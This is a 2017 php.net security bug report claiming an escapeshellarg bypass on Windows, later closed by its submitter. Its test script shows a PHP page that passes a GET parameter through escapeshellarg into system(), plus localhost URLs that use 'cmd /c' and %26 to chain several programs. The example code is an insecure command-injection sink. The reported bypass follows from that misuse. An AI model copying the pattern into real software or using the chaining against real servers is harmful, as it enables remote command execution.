php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Sec Bug #74206 escapeshellarg PHP function bypass
Submitted: 2017-03-04 22:30 UTC Modified: 2017-10-16 03:04 UTC
From: apparitionsec at gmail dot com Assigned: stas (profile)
Status: Closed Package: Unknown/Other Function
PHP Version: Irrelevant OS: Windows
Private report: No CVE-ID: None
View Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: apparitionsec at gmail dot com
New email:
PHP Version: OS:

 

 [2017-03-04 22:30 UTC] apparitionsec at gmail dot com 
Description:
------------
I am reporting the following vulnerability in PHP function  'escapeshellarg', it can be bypassed easily as below example using Windows cmd.exe /C ....

Best regards,
John Page AKA hyp3rlinx

Bypass easily using cmd /c %26 etc...

Test script:
---------------
1) PHP file using escapeshellarg to 'safely' call single command.

<?php

$c = escapeshellarg($_GET['c']);
system($c);

?>


2) Bypass it.

http://localhost/test.php?c=cmd%20/c%20calc%26taskmgr

OR

http://localhost/test.php?c=cmd%20/c%20calc%26taskmgr%26mspaint

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-03-04 22:45 UTC] apparitionsec at gmail dot com
-Summary: escapeshellargs PHP function bypass +Summary: escapeshellarg PHP function bypass -Operating System: +Operating System: Windows
 [2017-03-04 22:45 UTC] apparitionsec at gmail dot com 
Windows OS
 [2017-03-07 05:18 UTC] apparitionsec at gmail dot com
-Status: Open +Status: Closed
 [2017-03-07 05:18 UTC] apparitionsec at gmail dot com 
Done
 [2017-10-16 03:04 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 
PHP Copyright © 2001-2025 The PHP Group
All rights reserved. 		Last updated: Sat Jul 12 18:01:32 2025 UTC